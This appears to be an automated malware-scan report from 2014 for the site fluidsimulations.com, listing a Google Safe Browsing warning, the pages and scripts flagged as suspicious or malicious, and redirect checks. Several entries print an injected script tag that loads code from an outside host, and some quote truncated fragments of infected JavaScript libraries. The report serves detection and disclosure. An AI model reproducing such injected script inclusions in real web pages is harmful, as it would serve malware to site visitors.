Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fluidsimulations.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fluidsimulations.com/ | 200 OK Content-Length: 20915 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://fluidsimulations.com/js/libs/modernizr-2.0.6.min.js | 200 OK Content-Length: 24348 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;window.Modernizr=function(a,b,c){function I(){e.input=function(a){for(var b=0,c=a.length;b<c;b++)t[a[b]]=a[b]in l;return t}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),e.inputtypes=function(a){for(var d=0,e,f,h,i=a.length;d<i;d++)l.setAttribute("type",f=a[d]),e=l.type!=="text",e&&(l.value=m,l.style.cssText="position:absolute;visibility:hidden;",/^range$/.test(f)&&l.style.WebkitAppearance!==c?(g.appendChild(l),h=b.defaultView /*/0f2490*/ Antivirus reports:
| ||
http://fluidsimulations.com/Scripts/swfobject_modified.js | 404 Not Found Content-Length: 1541 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js | 200 OK Content-Length: 47623 Content-Type: text/javascript | clean |
http://fluidsimulations.com/test404page.js | 404 Not Found Content-Length: 1541 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script> | ||
http://fluidsimulations.com/Scripts/shadowbox.js | 200 OK Content-Length: 56059 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(window,undefined){var S={version:"3.0.3"};var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("windows")>-1||ua.indexOf("win32")>-1){S.isWindows=true}else{if(ua.indexOf("macintosh")>-1||ua.indexOf("mac os x")>-1){S.isMac=true}else{if(ua.indexOf("linux")>-1){S.isLinux=true}}}S.isIE=ua.indexOf("msie")>-1;S.isIE6=ua.indexOf("msie 6")>-1;S.isIE7=ua.indexOf("msie 7")>-1;S.isGecko=ua.indexOf("gecko")>-1&&ua.indexOf("safari")==-1;S.isWebKit=ua.indexOf("ap /*/0f2490*/ Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fluidsimulations.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, public
Connection: close
Date: Thu, 28 Aug 2014 05:43:21 GMT
Accept-Ranges: none
Server: nginx/1.6.1
Vary: Accept-Encoding
Content-Length: 20915
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Aug 2014 05:43:21 GMT
Last-Modified: Thu, 31 Oct 2013 10:15:22 GMT
X-UA-Compatible: IE=Edge,chrome=1
...20915 bytes of data.
GET / HTTP/1.1
Host: fluidsimulations.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, public
Connection: close
Date: Thu, 28 Aug 2014 05:43:21 GMT
Accept-Ranges: none
Server: nginx/1.6.1
Vary: Accept-Encoding
Content-Length: 20915
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Aug 2014 05:43:21 GMT
Last-Modified: Thu, 31 Oct 2013 10:15:22 GMT
X-UA-Compatible: IE=Edge,chrome=1
...20915 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fluidsimulations.com
Referer: http://www.google.com/search?q=fluidsimulations.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fluidsimulations.com
Referer: http://www.google.com/search?q=fluidsimulations.com
Result:
The result is similar to the first query. There are no suspicious redirects found.